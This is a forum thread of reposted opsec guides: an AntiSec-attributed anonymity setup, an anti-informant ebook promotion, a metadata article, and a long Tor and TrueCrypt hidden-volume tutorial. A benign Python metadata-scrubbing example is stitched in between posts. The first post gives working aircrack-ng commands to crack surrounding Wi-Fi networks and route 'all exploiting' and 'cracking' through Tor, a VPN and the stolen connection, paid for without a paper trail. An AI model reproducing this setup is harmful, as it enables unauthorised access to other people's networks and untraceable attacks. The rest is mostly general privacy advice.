Who's A Rat - Largest Online Database of Informants and Agents
hannah

Posts: 797
#1

Want to stay safe online?

 http://www.facebook.com/notes/lulzsec/want-to-be-a-ghost-on-the-internet/230293097062823

By @AntiSecOp

 

Required files:

  • VMWare Workstation: http://www.demonoid.me/files/details/2787488/008172892720/
  • Windows 7 Ultimate: http://www.demonoid.me/files/details/2811393/003064834770/
  • BackTrack 5 R1 VMWare: http://www.backtrack-linux.org/ajax/download_redirect.php?id=BT5R1-GNOME-VM-32.7z
  • pfsense: http://files.chi.pfsense.org/mirror/downloads/pfSense-2.0.1-RELEASE-amd64.iso.gz
  • Ubuntu Live CD: http://www.ubuntu.com/start-download?distro=desktop&bits=32&release=latest

 

 

Required Hardware:

Virtualization supported CPU

4GB RAM

USB wifi adapter supporting packet injection: http://www.amazon.com/Alfa-802-11b-Wireless-Original-9dBi/dp/B001O9X9EU/ref=sr_1_2?ie=UTF8&qid=1328768355&sr=8-2

 

 

VPN Account without paper trail

  • Purchase prepaid visa card with cash
  • Purchase Bitcoins with Money Order
  • Donate Bitcoins to different account
  • Purchase VPN account with bitcoins

 

 

VPN Services

oVPN.to

 

 

 

Step One

  • Enable Boot and Setup page BIOS password
  • Turn computer on, press key to enter Setup. Usually F1, F2, F11, Del, something similar. Then go to the Security tab

 

 

Step Two

  • Boot Ubuntu LiveCD to cleanly wipe hard drive
  • After booting LiveCD, open up terminal and type "sudo fdisk -l" to get a list of disks and partitions
  • Use the wipe command on each partition that is listed with the above command, i.e. "sudo wipe /dev/sda1"
  • Repeat for each drive (sdb, sdc) and each partition (sda1, sda2)
  • Reboot

 

 

Step Three

  • Install Windows 7 Ultimate and shred free space
  • Boot from Windows disk and install
  • After clean install, install fileshredder http://www.fileshredder.org
  • Run fileshredder using "Secure Erasing Algorithm with 7 passes"
  • Reboot
  • Enable BitLocker drive encryption. Save key to USB stick
  • Reboot
  • Run Windows Update
  • Turn off Swap space (Control Panel > System and Security > Advanced > Performance > Disable Virtual Memory)
  • Reboot

 

 

Step Four

Install VMWare  

 

 

Step Five

  • BackTrack 5 R1 Virtual Machine to be used for cracking WiFi
  • Open VMWare and import the BackTrack 5 R1 VMWare image (link above)
  • Set VM to 256MB RAM
  • Create a Network Adapter (VMNet0)
  • Directly attach USB wifi adapter (VM > Removable Devices > Check Wireless Adapter)
  • Bridge eth0 to wlan0

 

Easy Mode method:

  • apt-get -y install network-manager
  • rm /etc/network/interfaces
  • reboot
  • Open Network Manager
  • eth0 IPv4 Settings > Method > Shared to other computers

 

  • Use aircrack-ng to crack surrounding AP's
  • airmon-ng stop wlan0
  • ifconfig wlan0 down
  • macchanger --mac 00:11:22:33:44:55 wlan0
  • airmon-ng start wlan0
  • airodump-ng wlan0
  • Get SSID and channel for next step
  • airodump-ng -c (channel #) -w (file name) --bssid (bssid) wlan0
  • Let this sit until you have plenty of data points
  • aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
  • Look for successful ACK
  • aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
  • Also let this run for a while, look for 10k ACK's
  • aircrack-ng -b (bssid) (file name-01.cap)
  • Connect to SSID

 

 

Step Six

  • Pfsense install to use VPN
  • 8 GB of Hard Drive space
  • 256MB RAM
  • Two Network Adapters (VMnet0 and VMnet1)
  • After installing from the downloaded ISO, set WAN to VMnet0 and LAN to VMnet1. You should get a WAN dhcp IP from VM#1
  • Assign LAN IP and enable DHCP (192.168.1.1/24)

 

Step Seven

  • Install TorBox to anonymize ALL traffic
  • 128MB RAM
  • 5GB Hard Drive space
  • One Network Adapter (VMnet1)
  • Follow Torproject.org instructions for TorBox https://trac.torproject.org/projects/tor/wiki/doc/TorBOX
  • Open a browser and go to http://192.168.1.1
  • Login to pfsense with admin/pfsense and change password, force https, and enable all logging
  • Go to PPTP VPN Tab and input info from VPN info above

 

 

Step Eight

  • BackTrack 5 R1 VM for all cracking/penetration testing/everything
  • Import another BT5 vmware image
  • 512MB RAM
  • One Network Adapter (VMnet1)
  • Set default Gateway to match the IP of your previous VM (TorBox)
  • ALL data will now travel securely (BT5 > Tor Network > Over VPN > Internet using cracked wifi)
  • Download Tor Bundle from torproject.org
  • Use FireFox Portable bundled with Tor Bundle (more secure)
  • All exploiting/penetration testing, cracking, etc is done on this VM

 

 

Step Nine

Encrypt All VM's

Open settings for Each VM in VMWare

Under Options > Enable Encryption

Set secure password

 


__________________
Test your connection for leaks:
http://ip-check.info/?lang=en

Use TAILS
https://tails.boum.org/

How to boot from USB and other great stuff:
http://www.rmprepusb.com/

Open pdf and word files online instead of on your puter'
http://view.samurajdata.se/

USE the net more securely:
https://pressfreedomfoundation.org/blog/2014/04/help-support-little-known-privacy-tool-has-been-critical-journalists-reporting-nsa
https://www.torproject.org/download/download

http://www.theintelligencenews.com/


"The world isn't run by weapons anymore, or energy, or money. It's run by little ones and zeroes......"



"There's a war out there, old friend. A world war. And it's not about who's got the most bullets. It's about who controls the information.... it's all about the information!"
0
hannah

Posts: 797
#2
 
Downloads

Download now by clicking a format in the left column.

These days, law enforcement at all levels -- from the local cop shop to obscure federal agencies -- uses snitches to trap ordinary people. Snitches tell lies that send their friends to jail. Paid agents provocateurs talk or trick otherwise harmless people into committing crimes. In many places, Snitch culture has virtually replaced real investigation of real crimes.

Don't think you're exempt if you're a "law-abiding citizen." The most trusting, naive, innocent people often make the easiest targets for these weaselly, lying, opportunistic vermin. Snitches specialize in targeting the vulnerable.

You may be in danger if you are:

  • A political activist
  • A recreational drug user
  • A hobbyist or business person who works with "sensitive" materials
  • A member of an unpopular religion
  • A gun owner or dealer
  • A participant in the underground economy
  • A photographer or videographer
  • A controversial thinker or writer
  • Or you just happen to hang out with the wrong people

Snitches are everywhere and they're hard to detect. This brief, FREE ebook, Rats, can help you:

  • Identify a snitch
  • Protect yourself against snitches and agents provocateurs
  • Protect your friends or colleagues
  • Know how to handle yourself if you get arrested

It could even help you avoid being pressured into becoming a snitch, yourself.

Rats is the work of ex-cops, lawyers, security experts, experienced activists, outlaws, former outlaws, trained interrogators, and more. In the hour or so it takes you to read their information, you'll gain a lifetime's worth of armor against snitches, informers, informants, agents provocateurs, narcs, finks, and similar vermin.

Download the Rats ebook now. Five electronic formats. All absolutely FREE. Download below or top of page left.

Share it with your friends. Spread it around. Offer copies for download on your own site or mirror this entire page. All we ask is that you provide a link back to http://rats-nosnitch.com/. Information is power -- the power of free people against a growing police state.

If you want to read the book in one of the ereader formats but don't own a Kindle or a Nook, you can download free reader software for phones, Windows and Mac computers, and other devices. Free Kindle apps from Amazon.com. Free Nook apps from Barnes & Noble.


Rats! Your guide to protecting yourself
against snitches, informers, informants,
agents provocateurs, narcs, finks,
and similar vermin

By Claire Wolfe
with the Commentariat of the Living Freedom blog




Rats is issued under a Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License. You may make copies and distribute them for any non-commercial purpose, as long as you keep the original attribution. You may not alter the text in any way, and you may not distribute the book commercially.

0
hannah

Posts: 797
#3

How to secure your computer and surf fully Anonymous BLACK-HAT STYLE
http://security23.wordpress.com/2011/11/25/how-to-secure-your-computer-and-surf-fully-anonymous-black-hat-style/
November 25, 2011 by SECURITY23

From cyberguerrilla.info (relocated links). This is a guide with which even a total noob can get high class security for his system and complete anonymity online. But it's not only for noobs, it contains a lot of tips most people will find pretty helpful. It is explained in such detail that even the biggest noobs can do it^^ :
=== The Ultimate Guide for Anonymous and Secure Internet Usage v1.0.1 ===

Table of Contents:

Obtaining Tor Browser
Using and Testing Tor Browser for the first time
Securing Your Hard Drive
Setting up TrueCrypt, Encrypted Hidden Volumes
Testing TrueCrypt Volumes
Securing your Hard Disk
Temporarily Securing Your Disk, Shredding Free Space
Installing VirtualBox
Installing a Firewall
Firewall Configuration
Installing Ubuntu
Ubuntu Initial Setup
Installing Guest Additions
Installing IRC (Optional)
Installing Torchat (Optional)
Creating TOR-Only Internet Environment
General Daily Usage

By the time you are finished reading and implementing this guide, you will be able to securely and anonymously browse any website and to do so anonymously. No one not even your ISP or a government agent will be able to see what you are doing online. If privacy and anonymity is important to you, then you owe it to yourself to follow the instructions that are presented here.

In order to prepare this guide for you, I have used a computer that is running Windows Vista. This guide will work equally well for other versions of Windows. If you use a different operating system, you may need to have someone fluent in that operating system guide you through this process. However, most parts of the process are easily duplicated in other operating systems.

I have written this guide to be as newbie friendly as possible. Every step is fully detailed and explained. I have tried to keep instructions explicit as possible. This way, so long as you patiently follow each step, you will be just fine.

In this guide from time to time you will be instructed to go to certain URLs to download files. You do NOT need TOR to get these files, and using TOR (while possible) will make these downloads very slow.

This guide may appear overwhelming. Every single step is explained thoroughly and it is just a matter of following along until you are done. Once you are finished, you will have a very secure setup and it will be well worth the effort. Even though the guide appears huge, this whole process should take at the most a few hours. You can finish it in phases over the course of several days.

It is highly recommended that you close *ALL* applications running on your computer before starting.

Links not working? Try here.

http://pastebin.com/sp6YAvGb

0
hannah

Posts: 797
#4

The danger of metadata [digital footprints]
http://security23.wordpress.com/2012/04/06/the-danger-of-metadata-digital-footprints/
April 6, 2012 by SECURITY23

What is metadata?

To put it bluntly, metadata is hidden data that can fuck you over. Fuck you over real hard and rough like, savvy?

Often defined as “data about data,” metadata is information about a specific file that’s often included within the file itself but that’s often not readily visible or modifiable to the end-user when z is viewing the file in the standard application that z would typically use to view the file.

In other words, metadata provides background information about a file. Chances are that every document you create, every digital photograph you take, every music file you download, and so on, all have little bits of metadata which can leak vital information about your identity.

Read the entire article at CyberGuerrilla.org

http://www.cyberguerrilla.info/blog/?p=5316

0
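An added example, not part of the quoted article or of the original post: the metadata described in post #4, shown for an Office Open XML (.docx) file, where author, last editor, company and timestamps live in `docProps/core.xml` and `docProps/app.xml` inside the ZIP package. The sample document, its values and the function names `read_metadata` and `scrub_metadata` are constructed for illustration.

```python
import io
import xml.etree.ElementTree as ET
import zipfile

CORE, APP = "docProps/core.xml", "docProps/app.xml"
CP = "http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
DC = "http://purl.org/dc/elements/1.1/"
DCTERMS = "http://purl.org/dc/terms/"
XSI = "http://www.w3.org/2001/XMLSchema-instance"
EXT = "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties"
# Keep the usual prefixes so xsi:type="dcterms:W3CDTF" still resolves on output.
for prefix, uri in (("cp", CP), ("dc", DC), ("dcterms", DCTERMS), ("xsi", XSI)):
    ET.register_namespace(prefix, uri)

EPOCH = "1970-01-01T00:00:00Z"
# Identifying fields and the neutral value written in their place (assumed policy).
NEUTRAL = {
    "creator": "", "lastModifiedBy": "", "Company": "", "Manager": "",
    "Template": "", "created": EPOCH, "modified": EPOCH,
    "lastPrinted": EPOCH, "revision": "1", "TotalTime": "0",
}
FIXED_ZIP_TIME = (1980, 1, 1, 0, 0, 0)  # ZIP entries carry their own timestamps


def make_sample_docx():
    """Build a constructed, minimal .docx-style package (sample values only)."""
    core = (
        f'<cp:coreProperties xmlns:cp="{CP}" xmlns:dc="{DC}" '
        f'xmlns:dcterms="{DCTERMS}" xmlns:xsi="{XSI}">'
        "<dc:creator>Jane Example</dc:creator>"
        "<cp:lastModifiedBy>jexample-laptop</cp:lastModifiedBy>"
        '<dcterms:created xsi:type="dcterms:W3CDTF">2012-04-06T09:15:00Z'
        "</dcterms:created><cp:revision>7</cp:revision></cp:coreProperties>"
    )
    app = (f'<Properties xmlns="{EXT}"><Application>Microsoft Office Word'
           "</Application><Company>Example Org</Company></Properties>")
    body = "<document><p>Visible text only.</p></document>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(CORE, core)
        zf.writestr(APP, app)
        zf.writestr("word/document.xml", body)
    return buf.getvalue()


def _local(tag):
    """Strip the '{namespace}' part from an ElementTree tag name."""
    return tag.rsplit("}", 1)[-1]


def read_metadata(data):
    """Return every non-empty property found in the two docProps parts."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        for part in (CORE, APP):
            if part not in names:
                continue
            for child in ET.fromstring(zf.read(part)):
                if child.text and child.text.strip():
                    found[_local(child.tag)] = child.text.strip()
    return found


def scrub_metadata(data):
    """Copy the package, neutralising identifying fields and ZIP timestamps."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            payload = src.read(info.filename)
            if info.filename in (CORE, APP):
                root = ET.fromstring(payload)
                for child in root:
                    name = _local(child.tag)
                    if name in NEUTRAL:
                        child.text = NEUTRAL[name]
                payload = ET.tostring(root, encoding="utf-8", xml_declaration=True)
            entry = zipfile.ZipInfo(info.filename, date_time=FIXED_ZIP_TIME)
            dst.writestr(entry, payload, compress_type=zipfile.ZIP_DEFLATED)
    return out.getvalue()


if __name__ == "__main__":
    sample = make_sample_docx()
    print("before:", read_metadata(sample))
    print("after: ", read_metadata(scrub_metadata(sample)))
```

Fields outside these two parts, such as tracked changes, comments and embedded images with their own EXIF data, are not touched by this example.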
hannah

Posts: 797
#5
here is the full guide in case it gets taken down



0-How to secure your computer and surf fully #anonymous BLACK-HAT STYLE


This is a guide with which even a total noob can get high class security for his system and complete anonymity online. But it's not only for noobs, it contains a lot of tips most people will find pretty helpful. It is explained in such detail that even the biggest noobs can do it^^ :

=== The Ultimate Guide for Anonymous and Secure Internet Usage v1.0.1 ===

Table of Contents:

1. Obtaining Tor Browser
2. Using and Testing Tor Browser for the first time
3. Securing Your Hard Drive
4. Setting up TrueCrypt, Encrypted Hidden Volumes
5. Testing TrueCrypt Volumes
6. Securing your Hard Disk
7. Temporarily Securing Your Disk, Shredding Free Space
8. Installing VirtualBox
9. Installing a Firewall
10. Firewall Configuration
11. Installing Ubuntu
12. Ubuntu Initial Setup
13. Installing Guest Additions
14. Installing IRC (Optional)
15. Installing Torchat (Optional)
16. Creating TOR-Only Internet Environment
17. General Daily Usage

By the time you are finished reading and implementing this guide, you will be able to securely and anonymously browse any website and to do so anonymously. No one not even your ISP or a government agent will be able to see what you are doing online. If privacy and anonymity is important to you, then you owe it to yourself to follow the instructions that are presented here.

In order to prepare this guide for you, I have used a computer that is running Windows Vista. This guide will work equally well for other versions of Windows. If you use a different operating system, you may need to have someone fluent in that operating system guide you through this process. However, most parts of the process are easily duplicated in other operating systems.

I have written this guide to be as newbie friendly as possible. Every step is fully detailed and explained. I have tried to keep instructions explicit as possible. This way, so long as you patiently follow each step, you will be just fine.

In this guide from time to time you will be instructed to go to certain URLs to download files. You do NOT need TOR to get these files, and using TOR (while possible) will make these downloads very slow.

This guide may appear overwhelming. Every single step is explained thoroughly and it is just a matter of following along until you are done. Once you are finished, you will have a very secure setup and it will be well worth the effort. Even though the guide appears huge, this whole process should take at the most a few hours. You can finish it in phases over the course of several days.

It is highly recommended that you close *ALL* applications running on your computer before starting.

Next:1 : Obtaining Tor Browser

=== 1 : Obtaining Tor Browser ===

The first step to becoming secure and anonymous online is to setup and install something called "TOR". "TOR" is short for "The Onion Router". The concepts behind TOR were first implemented by the United States Military, and these principles have been used to create an extremely secure mechanism for being anonymous online. In fact, millions of people world-wide use TOR to browse the internet and communicate anonymously.

TOR works by heavily encrypting your communications so that no observer can see what website you are really going to, and what information is really being sent. It all appears as a bunch of random characters to any observer. You simply use the TOR web browser just as you use any other web browser. TOR takes care of the rest.

However, TOR by itself is not enough. Even when using TOR, a user can be compromised in a number of ways. First, some websites can be set up to attempt to reveal someone's true IP address (their true identity) by tricking their web browser or other software to transmitting that information. For this reason, anyone who uses TOR will recommend that no one have javascript or flash turned on while browsing TOR. In this guide however, I will show you a much better solution.

The second issue is that of human error. Even if you have TOR installed, you may accidentally forget which browser to put in a link. You may also accidentally click on a link from another program, such as a chat program. That program might then load the link you clicked on into a non-TOR browser. When you are using TOR, you must be careful *constantly* that every link goes into the right browser, and that you do not accidentally click the wrong link.

So then, let's begin. Obtaining the TOR Browser is easy. Simply go to the following website:

http://www.torproject.org

Once here, you may feel free to read more about what TOR is and how it works, or you may proceed to immediately download TOR.

Here is how to do so:

1. Click on "Download TOR", or "Download".

2. You will see text that says, "The Tor Browser Bundle contains everything you need ... Just extract it and run. Learn more >>"

3. Click on this "Learn more" link for the "Tor Browser Bundle".

4. Assuming you are an English speaker, you would choose the top-most link "English (en-US)". Otherwise, pick the language best suited to you.

5. The file being saved will be named: tor-browser-1.3.18_en-US.exe

It is ok if the number is not exactly 1.3.18, there are new versions of Tor from time to time. At the time that this guide was written, 1.3.18 was most current. By the time you are reading this, a more current version of TOR may exist.

6. Run this file.

7. You will be prompted to extract this to a directory. By default, it will be set to C:\Users\You\Downloads. This is perfectly ok. You can also choose a different directory if you wish.

8. Click "Extract"

That's it. TOR Browser is NOW installed. Time to test it out!

Next 2 : Using and Testing Tor Browser for the first time ===

=== 2 : Using and Testing Tor Browser for the first time ===

Now you have successfully downloaded and installed the Tor Web Browser Bundle. You are no doubt anxious to begin using it. First, click on the "start" menu icon, the icon in the lower left of your screen with the windows logo. On the top right will be a listing that says "You", "Documents", "Pictures", "Music"... "You" of course will be replaced by your user name. Click on "You", the top most link. This will open up your main user folder.

Now, locate the folder called "Downloads" and double click on it.

Now, inside the "Downloads" folder, double click on the folder called "Tor Browser".

Lastly, double click on the application: "Start Tor Browser"

When you do, you will see the Vidalia Control Panel appear, and you will observe as you connect to the TOR network. When this is complete, your web browser will open up and will automatically connect to the web address: check.torproject.org

This is to confirm that you are in fact using TOR. If you have followed this guide correctly, then you will see the following green text, or something similar:

"Congratulations. Your browser is configured to use Tor."

Now you can use this web browser the same as any other. You can go to any website you wish, and neither your ISP or anyone else will be able to see where you are going, or what you are doing. However, there are still issues that need to be resolved, so don't begin browsing just yet.

*************************************
***** IMPORTANT SAFETY NOTE *****
*************************************
If you fill out a form containing your email address, your name, or any other sensitive information while using the TOR browser, be aware that sometimes it is possible for an observer to see that information. When using TOR, use it to access websites and content that you are *not* connected to via your real identity or any username or nick name which links to your real identity. Let TOR be for anonymous browsing solely. Do your online banking, or any other activities involving your real identity using your normal web browser.
************************************

Next: 3 : Securing Your Hard Drive ===

=== 3 : Securing Your Hard Drive ===

Being able to browse anonymously is one thing. However, you may choose to download and save sensitive content or material to your computer which you wish to keep private. This may include reading sensitive documents, viewing pictures, or storing any kind of sensitive data.

If you save *anything* to your computer's harddrive, then it is possible for someone who has confiscated your computer to determine what it was you saved. This is often true even if you delete the content. For example, suppose I use the Tor Browser and I navigate to a website containing a sensitive document that I wish to read. If I saved that document somewhere on my harddrive, then it is possible for someone else to find it. If I *delete* that document, it may still be possible for someone to undelete it.

Further, even if I never save it to my harddrive but I simply look at it using my word processing software, it may still be saved in a number of ways including:

1. Often programs keep records of filenames. The filename alone is often enough to incriminate someone.

2. Often programs keep parts of the content viewed saved for various reasons, such as for searching. This can include random excerpts of text, thumbnails of images, and more. Often this "partial" data is more than enough to prove what the original data was. Often the "partial" data is itself incriminating.

3. Sometimes, especially if you are running low on system memory, your operating system may choose to use your hard-disk as a temporary RAM. This is known as "SWAP". Normally, whenever you turn off your computer, whatever was in RAM is deleted. However, the data that goes to your SWAP may persist and it may be possible for someone to see what content you had open in your programs if that information is saved in RAM.

Generally speaking, you *must* have a plan to secure any content that is saved to your hard disk. Therefore, this guide would be incomplete if we did not thoroughly address this. First, there are two kinds of such content:

1. Deliberately saved content.
2. Inadvertently saved content.

Deliberately saved content refers to content that you have chosen to save on your harddisk so that you can access this content later. We will address how to do this later in the guide.

Inadvertently saved content refers to content that is saved by programs you use, or your operating system. You have no way to even know what this content might be. Therefore, this is the most dangerous. You may browse and find a dozen sensitive documents, utterly delete them, and some program may have saved the file names and excerpts of the data. This will render your previous efforts futile.

Content that is inadvertently saved to your harddisk comes in two flavors:

1. Content that is saved to your SWAP space.

2. Content that is saved by applications running on your computer, including your operating system.

The surest way to prevent content from writing to your SWAP space is to disable your SWAP space altogether. This may result in your computer running a bit slower than normal, and may mean that you cannot use ram intensive games and applications during the time your SWAP is disabled.

Therefore, if you use this method, simply turn back on the SWAP when you want to use those ram intensive applications. Also, you may choose not to take this step.


1 - Here is how to disable your swap space if you are using Windows 7:

*** ADVANCED INSTRUCTIONS BELOW. SKIP THIS IF YOU ARE NOVICE OR UNCOMFORTABLE WITH THIS OPERATION ***

*This step is recommended for advanced users only. If you are not comfortable doing this, you may safely skip this step.*

Instructions are less verbose than usual, as these steps are intended for advanced users only. If you do not fully understand these instructions, skip this step.

1. From Control Panel, go to "System and Security".

2. Click on "System", and then choose "Advanced system settings" in the left-most menu.

3. Under the "Advanced" tab, under "Performance", click "Settings".

4. Under this "Advanced" tab, under "Virtual Memory", click "Change".

5. Uncheck "Automatically manage paging file sizes for all drives".

6. Select "No paging file".

7. Save, reboot, and follow these same first 5 steps to confirm that "No paging file" is still selected. This means that you have successfully disabled your swap. This means that *nothing* from RAM will be inadvertently saved to your harddrive.

To resume using SWAP again, simply click "Automatically manage paging file size for all drives." You can switch between these two modes as you desire.

Generally speaking, your computer will run fine without a swap file, provided you have enough RAM.

*** END OF ADVANCED INSTRUCTIONS ***

The next issue we need to address is how to prevent applications and/or your operating system from saving content inadvertently that you do not want saved. For this, we are going to set up a "Virtual Machine".

A "Virtual Machine" is like a computer inside of your computer. Everything you do inside the Virtual Machine (vm for short) will be fully contained within itself and no one will be able to see what the vm has been doing. Ideally, you want *ALL* of your sensitive computer usage of any kind, TOR or NON TOR, to take place within a vm. In this way, you can keep everything private that you wish while still using your computer fully and getting the most out of it.

Don't be afraid if this sounds complicated. This guide will take you through every step slowly and methodically. Before we can set up a vm however, we need to take another step.

Next: 4 : Setting up TrueCrypt, Encrypted Hidden Volumes ===

=== 4 : Setting up TrueCrypt, Encrypted Hidden Volumes ===

If you save anything on your computer, it is likely that you do not want just anyone to be able to see what you have saved. You want a way to protect that information so that you can access it, and absolutely no one else except those you trust. Therefore, it makes sense to set up a system which protects your information and safeguards it against prying eyes.

The best such system for this is called "True Crypt". "True Crypt" is an encryption software program which allows you to store many files and directories inside of a single file on your harddrive. Further, this file is encrypted and no one can actually see what you have saved there unless they know your password.

This sounds extremely high tech, but it is actually very easy to set up. We are going to do so, right now:

1. Go to http://www.truecrypt.org/downloads (or go to http://www.truecrypt.org, and click on "Downloads")
2. Under "Latest Stable Version", under "Windows 7/Vista/XP/2000", click "Download"
3. The file will be called "True Crypt Setup 7.0a.exe" or something similar. Run this file.
4. If prompted that a program needs your permission to continue, click "Continue".
5. Check "I accept and agree to be bound by these license terms"
6. Click "Accept"
7. Ensure that "Install" is selected, and click "Next"
8. click "Install"
9. You will see a dialog stating "TrueCrypt has been successfully installed." Click "Ok"
10. Click "No" when asked if you wish to view the tutorial/user's guide.
11. Click "Finish"

At this point, TrueCrypt is now installed. Now we will set up truecrypt so that we can begin using it to store sensitive information.

1. Click the "Windows Logo"/"Start" button on the lower left corner of your screen.
2. Click "All Programs"
3. Click "TrueCrypt"
4. Click the "TrueCrypt" application

And now we can begin:

1. click the button "Create Volume"
2. Ensuring that "Create an encrypted file container" is selected, click "Next"
3. Select "Hidden TrueCrypt volume" and click "Next".
4. Ensuring that "Normal mode" is selected, click "Next"
5. Click on "Select File"

Note which directory you are in on your computer. Look at the top of the dialog that has opened and you will see the path you are in, most likely the home directory for your username. An input box is provided with a flashing cursor asking you to type in a file name. Here, you will type in the following filename:

random.txt

You may of course replace random.txt with anything you like. This file is going to be created and will be used to store many other files inside. Do NOT use a filename for a file that already exists. The idea here is that you are creating an entirely new file.

It is also recommended though not required that you "hide" this file somewhere less obvious. If it is in your home directory, then someone who has access to your computer may find it easier. You can also choose to put this file on any other media, it doesn't have to be your hard disk. You could for example save your truecrypt file to a usb flash drive, an sd card, or some other media. It is up to you.

6. Once you have typed in the file name, click "Save"
7. Make sure "Never save history" is checked.
8. Click "Next"
9. On the "Outer Volume" screen, click "Next" again.
10. The default Encryption Algorithm and Hash Algorithm are fine. Click "Next"
11. Choose a file size.

In order to benefit the most from this guide, you should have at least 10 gigabytes of free disk space. If not, then it is worth it for you to purchase some form of media (such as a removable harddrive, a large sd card, etc.) in order to proceed. TrueCrypt can be used on all forms of digital media not just your hard disk. If you choose to proceed without obtaining at least ten gigabytes of disk space, then select a size that you are comfortable with (such as 100 MB).

Ideally, you want to choose enough space to work with. I recommend 20 GB at least. Remember that if you do need more space later, you can always create additional TrueCrypt volumes using exactly these same steps.

12. Now you are prompted for a password. THIS IS VERY IMPORTANT. READ THIS CAREFULLY

*** READ THIS SECTION CAREFULLY ***

*** The password you choose here is a decoy password. That means, this is the password you would give to someone under duress. Suppose that someone suspects that you were accessing sensitive information and they threaten to beat you or worse if you do not reveal the password. THIS is the password that you give to them. When you give someone this password, it will be nearly impossible for them to prove that it is not the RIGHT password. Further, they cannot even know that there is a second password. ***

Here are some tips for your password:

A. Choose a password you will NEVER forget. It may be ten years from now that you need it. Make it simple, like your birthday repeated three times.
B. Make sure it seems reasonable, that it appears to be a real password. If the password is something stupid like "123" then they may not believe you.
C. Remember that this is a password that you would give to someone if forced. It is *NOT* your actual password.
D. Do not make this password too similar to what you plan to really use. You do not want someone to guess your main password from this one.

And with all of this in mind, choose your password. When you have typed it in twice, click "Next".

13. "Large Files", here you are asked whether or not you plan to store files larger than 4 GIGABYTES. Choose "No" and click "Next"
14. "Outer Volume Format", here you will notice some random numbers and letters next to where it says "Random Pool". Go ahead and move your mouse around for a bit. This will increase the randomness and give you better encryption. After about ten seconds of this, click "Format".
15. Depending on the file size you selected, it will take some time to finish formatting.

"What is happening?"

TrueCrypt is creating the file you asked it to, such as "random.txt". It is building a file system contained entirely within that one file. This file system can be used to store files, directories, and more. Further, it is encrypting this file system in such a way that without the right password it will be impossible for anyone to access it. To *anyone* other than you, this file will appear to be just a mess of random characters. No one will even know that it is a truecrypt volume.

16. "Outer Volume Contents", click on the button called, "Open Outer Volume"

An empty folder has opened up. This is empty because you have yet to put any files into your truecrypt volume.

*** *** DO NOT PUT ANY SENSITIVE CONTENT HERE *** ***

This is the "Decoy". This is what someone would see if you gave them the password you used in the previous step. This is NOT where you are going to store your sensitive data. If you have been forced into a situation where you had to reveal your password to some individual, then that individual will see whatever is in this folder. You need to have data in this folder that appears to be sensitive enough to be protected by truecrypt in order to fool them. Here are some important tips to keep in mind:

A. Do NOT use porn. Adult models can sometimes appear to be underaged, and this can cause you to incriminate yourself unintentionally.
B. Do NOT use drawings/renderings/writings of porn. In many jurisdictions, these are just as illegal as photographs.
C. Good choices for what to put here include: backups of documents, emails, financial documents, etc.
D. Once you have placed files into this folder, *NEVER* place any more files in the future. Doing so may damage your hidden content.

Generally, you want to store innocent data where some individual looking at it would find no cause against you, and yet at the same time they would understand why you used TrueCrypt to secure that data.

Now, go ahead and find files and store them in this folder. Be sure that you leave at least ten gigabytes free. The more the better.

When you are all done copying files into this folder, close the folder by clicking the "x" in the top right corner.

17. Click "Next"

18. If prompted that "A program needs your permission to continue", click "Continue"
19. "Hidden Volume", click "Next"
20. The default encryption and hash algorithms are fine, click "Next"
21. "Hidden Volume Size", the maximum available space is indicated in bold below the text box. Round down to the nearest full unit. For example, if 19.97 GB is available, select 19 GB. If 12.0 GB are available, select 11 GB.
22. If a warning dialog comes up, asking "Are you sure you wish to continue", select "Yes"
23. "Hidden Volume Password"

*** IMPORTANT READ THIS ***

Here you are going to select the REAL password. This is the password you will NEVER reveal to ANYONE else under any circumstances. Only you will know it. No one will be able to figure it out or even know that there is a second password. Be aware that an individual intent on obtaining your sensitive information may lie to you and claim to be able to figure this out. They cannot.

It is HIGHLY recommended that you choose a 64 character password here. If it is difficult to remember a 64 character password, choose an 8 character password and simply repeat it 8 times. A date naturally has exactly 8 numbers, and a significant date in your life repeated 8 times would do just fine.

24. Type in your password twice, and click "Next"
25. "Large Files", select "Yes" and click "Next".
26. "Hidden Volume Format", as before move your mouse around for about ten seconds randomly, and then click "Format".
27. If prompted "A program needs your permission to continue", select "Continue"
28. A dialog will come up telling you that the hidden TrueCrypt volume has been successfully created. Click "Ok"
29. Click "Exit"

Congratulations! You have just set up an encrypted file container on your hard drive. Anything you store here will be inaccessible to anyone except you. Further, you have protected this content with TWO passwords. One that you will give to someone under threat, and one that only you will know. Keep your real password well protected and never write it down or give it to anyone else for any reason.

Now, we should test BOTH passwords.

=== 5. Testing TrueCrypt Volumes ===

Once you have completed the above section, you will be back at TrueCrypt. Go ahead and follow these steps to test the volumes you have made.

1. Click "Select File..."
2. Locate the file you created in the last section, most likely called "random.txt" or something similar. Remember that even though there is both an outer and a hidden volume, both volumes are contained in a single file. There are not two files, only one.
3. Click "Open"
4. Choose a drive letter that you are not using (anything past M is probably just fine). Click on that. For example, click on "O:" to highlight it.
5. Click "Mount"
6. Now you are prompted for a password. Read the below carefully:

The password you provide here will determine WHICH volume is mounted to the drive letter you specified. If you type in your decoy password, then O: will show all the files and directories you copied that you would reveal if forced. If you type in your real password, then O: will show the files and directories that you never intend anyone to see.

7. After successfully typing in your password, you will see additional detail to the right of the drive letter, including the full path to the file you selected as well as the kind of volume it is (for example, hidden).
8. Right click on your "Windows Logo"/"Start Menu" icon, and scroll down to the bottom where you can see your different drive letters. You will see the drive letter you selected, for example: "Local Disk (O:)". Click on that.
9. If you selected your decoy password, you will see all the files and folders that you moved there during the installation phase. If you selected the real password, you will see whatever files and directories you have placed so far into the hidden volume, if any.

If you selected your hidden volume password, you may now begin moving any sensitive information you wish. Be aware that simply moving it from your main hard disk is not enough. We will discuss how to ensure deleted data is actually deleted later in the guide.

"What is happening?"

